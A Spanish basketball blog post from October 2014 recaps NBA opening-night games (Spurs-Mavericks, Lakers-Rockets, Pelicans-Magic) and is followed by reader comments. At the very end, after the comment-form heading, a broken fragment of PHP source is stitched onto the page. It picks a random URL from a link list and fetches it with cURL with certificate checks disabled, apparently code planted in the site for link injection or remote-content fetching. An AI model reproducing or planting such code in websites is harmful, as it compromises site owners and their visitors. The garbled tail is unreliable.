La Crónica (28/10/2014): Una de Anillos, cejas y sueños rotos

29 de October de 2014 por FranGuaita

Primer capítulo de la temporada NBA 14/15. Spurs y Mavericks protagonizaron un duelo tejano frenético que pudo ganar cualquiera. El campeón consiguió el triunfo tras un final de infarto con triple at the buzzer de Parsons que no entró por milímetros. Continúa el drama en Lakerland. Ridículo contra Rockets y, lo que es peor, grave lesión de Julius Randle. El pick número 7 del Draft 2014 tuvo que abandonar el Staples entre lágrimas y con la pierna derecha inmovilizada. En New Orleans, Anthony Davis destrozó a Orlando con un partido titánico. El hombre de la ceja se quedó a un tapón del triple doble.

SPURS 101-MAVS 100

Chandler Parsons tuvo un triple en el último segundo para arruinar la fiesta del campeón. Su lanzamiento desde casi ocho metros fue escupido por el aro y San Antonio dispara a 5-0 su récord en partidos disputados tras la ceremonia del anillo. De milagro, eso sí. Mientras Tim Duncan y Tony Parker, aliviados, se buscaban con la mirada, el sargento Popovich emprendía el camino a las entrañas del AT&T Center con gesto contrariado. La imagen ofrecida anoche por sus Spurs dista notablemente del rodillo que maravilló al mundo en las pasadas finales ante Miami. En parte es lógico. La franquicia no ha realizado la clásica pretemporada -viajes a Alemania y Turquía a principios de mes-, Coach Pop no pudo disponer de la sociedad Kawhi Leonard-Tiago Splitter y, fundamentalmente, ayer tuvo delante a un equipo capaz de ganar cualquiera de sus próximos 81 partidos. Ya lo verán. Mucho ojo a estos Dallas Mavericks.

La franquicia que dirige Rick Carlisle aceptó el desafío de intercambio de golpes en el arranque. Posesiones rápidas y mucho small ball a cargo de uno de los backcourts más prolíficos del oeste. Nelson eléctrico en la dirección, Parsons abierto buscando sus tiros librados o jugando uno por uno en segundos finales de posesión y, cómo no, Monta Ellis en el rol de ejecutor. El escolta nacido en Jackson (Mississippi) fue un martillo pilón constante para la defensa de perímetro de los Spurs, incapaz de detener la frescura de piernas y el primer paso del que fuera jugador de Warriors y Bucks. Al descanso, propulsados por los 14 puntos y 4 asistencias de Ellis, los Mavericks flirteaban con el 50% en tiros de campo (22-45) y asaltaban la guarida del campeón. Ocho arriba (45-53).

Duncan cambió el guión tras el paso por vestuarios. Destapando todo el arsenal: tiros a tabla, carga del rebote ofensivo, intimidación detrás… y mucha materia gris. Con grandes dosis de coco sacó petróleo en forma de técnicas a Chandler y Nowitzki. San Antonio se metió de lleno en el partido con un parcial de 15-4 para iniciar el tercero. El resto de la madrugada fue un divino columpio. Un simulacro de playoffs. Primero emergió la figura de Manu Ginóbili para enchufar dos triples al límite de la posesión. Después, Dirk se colgó del cielo para meter una suspensión excelentemente punteada por Danny Green. En el último periodo la segunda unidad de los Spurs comandada por Boris Diaw y Cory Joseph colocaba a Dallas al límite del abismo con siete puntos consecutivos. Pero Carlisle rebuscó en las profundidades de su banquillo para -otra vez con los pequeños, Devin Harris 17 puntos- devolver a su equipo a la batalla hasta el último tiro. Salió cruz… pero los Mavericks ya se han ganado el respeto del campeón. En tan sólo 48 minutos.

LAKERS 90 – ROCKETS 108

Si el realizador de la TNT no hubiera pinchado varios primeros planos de Byron Scott durante el partido, cualquiera podría pensar que Mike D’Antoni sigue habitando entre nosotros. Mal asunto para los Lakers, a quienes no debería servir de excusa la lesión crónica en la espalda de Steve Nash o la ausencia durante unos partidos del díscolo Nick Young. La franquicia prosigue en el viaje a ninguna parte emprendido por el ínclito Jim Buss, incapaz de llegar a la suela de los zapatos de su señor padre ni viviendo un millón de años. Y, por si los desmanes del heredero no fueran suficientes, el mal fario de las lesiones. Julius Randle, la gran esperanza púrpura y dorado para el futuro, tuvo que abandonar la pista del Staples en camilla, llorando de impotencia y con la rodilla derecha inmovilizada. Rachel Nichols, de TNT, aseguraba pocos minutos después de la acción de la lesión que el jugador se había roto la pierna. En el día de su estreno. Un drama. Houston, a lo suyo. Primera W de la regular season sin pasar de tercera. Más 12 al final del primero, 17 arriba al descanso y 90-108 en la despedida y cierre. 32 puntos de Harden en 30 minutos. Ni sufrieron por los problemas de personales de Howard, que protagonizó el momento morboso de la madrugada. Pique con Kobe por un exceso de codos que se resolvió con una flagrante para cada uno.

kobe_dwight

PELICANS 101-MAGIC 84

La página web de New Orleans aseguraba ayer en la previa del partido ante Orlando que el objetivo de los Pelicans en esta regular season es conseguir la clasificación para los playoffs. Las prestaciones exhibidas por su frontcourt en el estreno de la temporada NBA legitiman los sueños del Smoothie King Center. Puede ser el año de Anthony Davis. El número 1 del Draft 2012 asume con naturalidad la responsabilidad que recae sobre sus hombros. Anoche fulminó a los bisoños Magic imponiendo su tiranía en la pintura. El hombre de la ceja se quedó a un gorro del triple doble: 26 puntos, 17 rebotes y 9 tapones. Sobrecogedor. Para escoltar a su estrella, Monty Williams dispone además de dos jugadores complementarios que dotan de versatilidad al juego interior: Ryan Anderson y Omer Asik. El californiano firmó la sentencia de Orlando con tres triples consecutivos en la recta final del tercer periodo. 11-0 de parcial para poner el 78-64 en el electrónico. Game over. Antes, el center turco se había encargado del trabajo sucio (12 puntos, 11 rebotes al descanso). Clásico partido inaugural marcado por los desajustes y un sinfín de detalles por pulir en ambos rosters. Especialmente llamativos el porcentaje de tiros libres en NOLA (15-31 48%) y los rebotes ofensivos concedidos por los Magic: 26. Intuyo que Jacque Vaughn firmaría ahora mismo conseguir ese número de victorias esta temporada. Por ahí andará la cifra.

adavis

PREMIOS

MVP: Los aficionados de los Pelicans pueden ser optimistas. La pareja que forman Anthony Davis y Omer Asik apunta a ser una de las más potentes de todo el campeonato. Anoche, “la ceja” se fue a los 26 puntos, 17 rebotes y 9 rebotes mientras que el turco aportó 14 puntos, 17 rebotes y 5 tapones. Simplemente insuperables.

Rookie: Relativo buen estreno para los rookies de Orlando, que seguramente contarán con muchos minutos esta temporada. Elfrid Payton salió de titular y acabó con 4 puntos, 5 rebotes y 7 asistencias mientras que Aaron Gordon anotó 11 puntos. Jordan Clarkson y Kostas Papanikolau también jugaron un buen número de minutos. El de los Lakers anotó 8 puntos y el jugador griego sólo 4 pero capturó 6 rebotes, repartió 4 asistencias y robó 2 balones.

Sorpresa: Ha cambiado medio equipo en Dallas pero ayer fue Devin Harris el que volvió a meter a los suyos en el partido en el último cuarto. De los 17 puntos, 5 asistencias y 2 robos con los que acabó el partido, 9 puntos, 2 asistencias y los 2 robos fueron en el periodo decisivo.

Decepción: El estreno de Chandler Parsons como jugador de los Mavs seguro que distó mucho de lo que él mismo esperaba, aunque su aportación siempre va más allá de los números. Sólo anotó 5 puntos y capturó 4 rebotes. Aún necesita tiempo para adaptarse.

Esfuerzo en vano: Hay que ser muy bueno para cogerle 23 rebotes a Davis y Asik. Además, Nikola Vucevic puso 4 tapones y anotó 15 puntos. Otro recital pero esta vez sin premio.

Top 10

Comenta

12 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Bienvenido a bordo!!!
    Mucha bajona lo de los Lakers anoche.

      Citar

  2. Denise dice:
    #2

    0 minutos para Harkless mientras Ben Gordon deambula por la pista. Vaugh vete ya!!

    Ricard Rubio parece que va a firmar 52 kilos en 4 años. Sobrepagado no, lo siguiente. Bajada de pantalones de los Wolves, para mi esta decisión complica el futuro del equipo para hacer un proyecto ganador. Si Ricky es el jugador franquicia con sus 13 kilos al año…apaga y vamonos…

      Citar

  3. jhc dice:
    #3

    Que buena pinta tiene Dallas este año, yo los metería en la pomada este año buen equipo el que se han montado este año

      Citar

  4. Nacho dice:
    #4

    Yo vi el partido del AT&T Center desde el segundo cuarto. Se notó que están ambos equipos en rodaje, pero que ambos fueron con ganas a por el partido.
    Flipante el backcourt de los campeones (jeje, el mío en la hoops) donde Belinelli (gracias también a la ausencia de Leonard) pinta mucho. El italiano se acostará todas las noches besando el altar que le ha puesto a Manudo, porque la forma de pasarle el testigo del crack argentino (ni Maradona ni hostias!) es, simplemente, maravillosa.
    El principio del tercer cuarto de los del Álamo fue un ‘remember this’. A partir de ahí controlaron un partido que casi se les va al final por falta de ritmo competitivo.
    Esto último lo sufrieron también los Mav’s, y por eso no se llevaron el gato al agua. Un Dirk que pasó casi desapercibido durante tres cuartos y medio y que surgió (sin apuntillar) al final como lo que es; una jodida maravilla de jugador. Monta muy bien, entre Jameer y Harris buen partido, Chandler ya avisa lo que aportará al equipo (cuidado con sus problemas de faltas, aunque los árbitros se cebaron de más con él) y Parsons mola, tiene que entrar en la dinámica, pero lo que más me preocupó ayer (si hablo como fan de los de Dallas) es cómo van a confluir él y el alemán en la pista. Así de memoria no recuerdo que Nowitzki haya jugado con un 3 que amasase tanto la bola y el juego ofensivo a su lado. ¡cuidado con robar galones!
    Lo de Monta y Dirk ya funcionó el año pasado, esperemos que el encaje de Chandler Parsons llegue al mismo término. Un equipo a tener muy en cuenta.

      Citar

  5. Fran Guaita dice:
    #5

    Un placer formar parte del equipo!!! Nos leemos…

      Citar

  6. Jose Luis dice:
    #6

    Randle 🙁

      Citar

  7. Ruxixon dice:
    #7

    Iba a comentar sobre otros menesteres pero la lesión de Randle me ha tocado un poco.Que una lesión golpee a cualquier jugador es una pena,pero que se cebe de esta manera en un rookie en su primer partido es poco menos que una jugarreta del destino.

    Ahora lo que iba a comentar. Lo primero,un lujo leer al nuevo miembro de la familia,FranGuaita.Gran estreno.Luego sobre el Magic – Pelicans,partido con el que perdí la virginidad en esta nueva temporada NBA.Se ha dicho que Orlando va muy corto de tiro exterior (¿alguien dijo Frye?) y esa fue su condena cuando además tienes que visitar la casa de Davis y Asik (no me esperaba que el turco pegara tan bien al lado de Davis).Estos dos no se quedaron atrás en el apartado ofensivo,uniéndose a la ecuación Ryan Anderson que con tres triples consecutivos sepultó el partido.

    Los rookies de Orlando bien a medias.Payton me pareció demasiado precipitado,con demasiadas ansias por agradar en su debut pero atrás bien.Aaron Gordon me encantó.Buena aportación en ataque,mucho desparpajo,para despejar las dudas de su elección con el 4º pick,y muy sólido atrás.El tio dando instrucciones en defensa a sus compañeros para pasar bloqueos y hacer cambios de hombre,carácter si señor.En el lado negativo que debe cerrar más el rebote,además viendo el resultado de ayer debe ayudar a su equipo.

      Citar

  8. Denise dice:
    #8

    Ruxixon:
    Iba a comentar sobre otros menesteres pero la lesión de Randle me ha tocado un poco.Que una lesión golpee a cualquier jugador es una pena,pero que se cebe de esta manera en un rookie en su primer partido es poco menos que una jugarreta del destino.

    Ahora lo que iba a comentar. Lo primero,un lujo leer al nuevo miembro de la familia,FranGuaita.Gran estreno.Luego sobre el Magic – Pelicans,partido con el que perdí la virginidad en esta nueva temporada NBA.Se ha dicho que Orlando va muy corto de tiro exterior (¿alguien dijo Frye?) y esa fue su condena cuando además tienes que visitar la casa de Davis y Asik (no me esperaba que el turco pegara tan bien al lado de Davis).Estos dos no se quedaron atrás en el apartado ofensivo,uniéndose a la ecuación Ryan Anderson que con tres triples consecutivos sepultó el partido.

    Los rookies de Orlando bien a medias.Payton me pareció demasiado precipitado,con demasiadas ansias por agradar en su debut pero atrás bien.Aaron Gordon me encantó.Buena aportación en ataque,mucho desparpajo,para despejar las dudas de su elección con el 4º pick,y muy sólido atrás.El tio dando instrucciones en defensa a sus compañeros para pasar bloqueos y hacer cambios de hombre,carácter si señor.En el lado negativo que debe cerrar más el rebote,además viendo el resultado de ayer debe ayudar a su equipo.

    Y Fournier, el de los naipes, que tal? Yo de verdad, en un equipo que no va a pasar de 25 victorias y su objetivo es desarrollar jovenes, no entiendo que hace Harkless jugando 0 minutos mientras Ben Gordon se chupa 23. Ojala sigan perdiendo de paliza, es la unica manera de que echen a Vaughn…

    Sobre Randle, por si alguién tenía esperanzas, se confirma que será Out of Season. La única noticia positiva que puedo extraer de esto es que Ed Davis, un jugador que siempre me ha gustado y ha sido maltratado e infravalorado en Toronto y Memphis, debería de terminar de explotar y marcarse una gran temporada a nivel personal.

    Enhorabuena, si, a Fran Guaita por la gran crónica.

      Citar

  9. Denise dice:
    #9

    Denise: Y Fournier, el de los naipes, que tal?

    Por cierto, puse Fournier en Google imagenes y en serio, no sé que enfermedad será relacionada con el miembro masculino, no he querido investigar porque las imagenes me ha puesto el estómago malo. Si alguna vez Fournier mete 30 puntos y quereis buscar una foto suya para ponerla en el articulo, escribid su nombre mejor. Increible la de enfermedades malas que hay…tocaremos madera.

      Citar

  10. Ruxixon dice:
    #10

    @Denise: Fournier entró mal en el partido y en general estuvo errático.Se ve obligado a tirar más y consecuentemente también va a fallar más.Veremos que medida va mostrando con el paso de los partidos pero es una posición mejorable dentro del quinteto.

      Citar

  11. Denise dice:
    #11

    Ruxixon:
    @Denise: Fournier entró mal en el partido y en general estuvo errático.Se ve obligado a tirar más y consecuentemente también va a fallar más.Veremos que medida va mostrando con el paso de los partidos pero es una posición mejorable dentro del quinteto.

    Ok, es que no puede jugar de 3 en la NBA, al margen de que es un jugador marginal y residual..

      Citar

  12. MagicJohnson32 dice:
    #12

    Denise: Ok, es que no puede jugar de 3 en la NBA, al margen de que es un jugador marginal y residual..

    Fournier es un 1-2 que puede jugar de SF muy ocasionalmente en quintetos pequeños. De hecho, su rendimiento como PG en Denver fue buenísimo cuando tuvo más minutos en esa posición por lesiones de compañeros.

    Ey, Denise, Channing Frye titular hoy!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>